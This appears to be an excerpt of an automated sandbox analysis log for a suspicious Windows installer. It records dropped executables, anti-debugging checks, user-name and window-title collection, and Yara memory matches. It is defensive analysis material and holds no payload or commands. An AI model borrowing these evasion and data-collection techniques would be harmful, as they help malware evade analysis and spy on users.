Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Code function: 1_2_004303A4 push ecx; mov dword ptr [esp], eax |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Code function: 1_2_0045A74C push ecx; mov dword ptr [esp], eax |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Code function: 1_2_004108E8 push ecx; mov dword ptr [esp], edx |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Code function: 1_2_00412B40 push 00412BA3h; ret |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Code function: 1_2_00450FF8 push 0045102Bh; ret |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Code function: 1_2_0040D240 push ecx; mov dword ptr [esp], edx |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Code function: 1_2_004055BD push eax; ret |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Code function: 1_2_00443660 push ecx; mov dword ptr [esp], ecx |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Code function: 1_2_0040568D push 00405899h; ret |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Code function: 1_2_00479768 push ecx; mov dword ptr [esp], ecx |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Code function: 1_2_0040570E push 00405899h; ret |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Code function: 1_2_004057F0 push 00405899h; ret |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Code function: 1_2_0040578B push 00405899h; ret |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Code function: 1_2_0040F7A0 push ecx; mov dword ptr [esp], edx |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Code function: 1_2_00419E40 push ecx; mov dword ptr [esp], ecx |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: 2_2_004311AD push esi; ret |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: 2_2_0040F4BB push ecx; ret |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | File created: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\LUxJPTIXtIs.exe | Jump to dropped file |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | File created: C:\Program Files (x86)\PrintFolders\unins000.exe (copy) | Jump to dropped file |
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Jump to dropped file |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | File created: C:\Users\user\AppData\Local\Temp\is-O82Q5.tmp\_isetup\_shfoldr.dll | Jump to dropped file |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | File created: C:\Program Files (x86)\PrintFolders\is-NNEQH.tmp | Jump to dropped file |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | File created: C:\Program Files (x86)\PrintFolders\is-6TIMV.tmp | Jump to dropped file |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | File created: C:\Program Files (x86)\PrintFolders\Russian.dll (copy) | Jump to dropped file |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | File created: C:\Users\user\AppData\Local\Temp\is-O82Q5.tmp\_isetup\_setup64.tmp | Jump to dropped file |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | File created: C:\Users\user\AppData\Local\Temp\is-O82Q5.tmp\_iscrypt.dll | Jump to dropped file |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | File created: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Jump to dropped file |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Code function: 1_2_00423E24 IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus, |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Code function: 1_2_00423E24 IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus, |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Code function: 1_2_004243F4 IsIconic,SetActiveWindow,SetFocus, |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Code function: 1_2_004243AC IsIconic,SetActiveWindow, |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Code function: 1_2_0041859C IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient, |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Code function: 1_2_00422A74 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow, |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Code function: 1_2_004177B0 IsIconic,GetCapture, |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Code function: 1_2_00477D2C IsIconic,GetWindowLongA,ShowWindow,ShowWindow, |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Code function: 1_2_00417EE6 IsIconic,SetWindowPos, |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Code function: 1_2_00417EE8 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement, |
Source: C:\Users\user\Desktop\file.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Users\user\Desktop\file.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Users\user\Desktop\file.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Users\user\Desktop\file.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Process information set: NOOPENFILEERRORBOX |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Process information set: NOOPENFILEERRORBOX |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Process information set: NOOPENFILEERRORBOX |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Process information set: NOOPENFILEERRORBOX |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Process information set: NOOPENFILEERRORBOX |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Process information set: NOOPENFILEERRORBOX |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Process information set: NOOPENFILEERRORBOX |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Process information set: NOOPENFILEERRORBOX |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Process information set: NOOPENFILEERRORBOX |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Process information set: NOOPENFILEERRORBOX |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Process information set: NOOPENFILEERRORBOX |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Process information set: NOOPENFILEERRORBOX |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Process information set: NOOPENFILEERRORBOX |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Process information set: NOOPENFILEERRORBOX |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\PrintFolders\unins000.exe (copy) | Jump to dropped file |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\PrintFolders\is-6TIMV.tmp | Jump to dropped file |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\PrintFolders\is-NNEQH.tmp | Jump to dropped file |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-O82Q5.tmp\_isetup\_shfoldr.dll | Jump to dropped file |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\PrintFolders\Russian.dll (copy) | Jump to dropped file |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-O82Q5.tmp\_isetup\_setup64.tmp | Jump to dropped file |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: __Init_thread_footer,GetUserNameA,GetUserNameA,__Init_thread_footer,GetUserNameA,__Init_thread_footer,GetUserNameA,GetForegroundWindow,GetWindowTextA,Sleep,Sleep,GetForegroundWindow,GetWindowTextA, |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Code function: 1_2_0046C770 FindFirstFileA,FindNextFileA,FindClose, |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Code function: 1_2_00474708 FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose, |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Code function: 1_2_00451554 FindFirstFileA,GetLastError, |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Code function: 1_2_0048A778 FindFirstFileA,6D2D69D0,FindNextFileA,FindClose, |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Code function: 1_2_004729D4 FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose, |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Code function: 1_2_0045CA54 FindFirstFileA,FindNextFileA,FindClose, |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Code function: 1_2_00406FEC FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime, |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Code function: 1_2_0045DB60 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode, |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Code function: 1_2_0045DEF4 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode, |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: 2_2_00404490 FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer, |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: 2_2_00423E2D FindFirstFileExW, |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: 2_2_1000959D FindFirstFileExW, |
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\ |
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp |
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\ |
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\ |
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Temp\ |
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\ |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: 2_2_0044028F mov eax, dword ptr fs:[00000030h] |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: 2_2_0042041F mov eax, dword ptr fs:[00000030h] |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: 2_2_004429E7 mov eax, dword ptr fs:[00000030h] |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: 2_2_00417BAF mov eax, dword ptr fs:[00000030h] |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: 2_2_100091C7 mov eax, dword ptr fs:[00000030h] |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: 2_2_10006CE1 mov eax, dword ptr fs:[00000030h] |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: 2_2_0040F789 SetUnhandledExceptionFilter, |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: 2_2_0041336B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: 2_2_0040F5F5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: 2_2_0040EBD2 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: 2_2_10006180 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: 2_2_100035DF SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: 2_2_10003AD4 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, |
Source: ntFolders.exe, 00000002.00000002.330751218.00000000034FF000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: Program Manager |
Source: ntFolders.exe, 00000002.00000002.330751218.00000000034FF000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: program manager |
Source: ntFolders.exe, 00000002.00000002.330751218.00000000034FF000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: F.program manager |
Source: C:\Users\user\Desktop\file.exe | Code function: GetLocaleInfoA, |
Source: C:\Users\user\Desktop\file.exe | Code function: GetLocaleInfoA, |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Code function: GetLocaleInfoA, |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Code function: GetLocaleInfoA, |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: GetKeyboardLayoutList,GetLocaleInfoA,__Init_thread_footer, |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: EnumSystemLocalesW, |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: EnumSystemLocalesW, |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: EnumSystemLocalesW, |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: EnumSystemLocalesW, |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: GetLocaleInfoW, |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: GetLocaleInfoW, |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: GetLocaleInfoW, |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, |
Source: Yara match | File source: 2.2.ntFolders.exe.400000.0.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 2.2.ntFolders.exe.400000.0.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 2.2.ntFolders.exe.3330000.3.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 2.2.ntFolders.exe.3330000.3.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 00000002.00000002.330488356.00000000031D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000002.00000002.329404364.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY |
Source: Yara match | File source: 00000002.00000002.330580256.0000000003330000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY |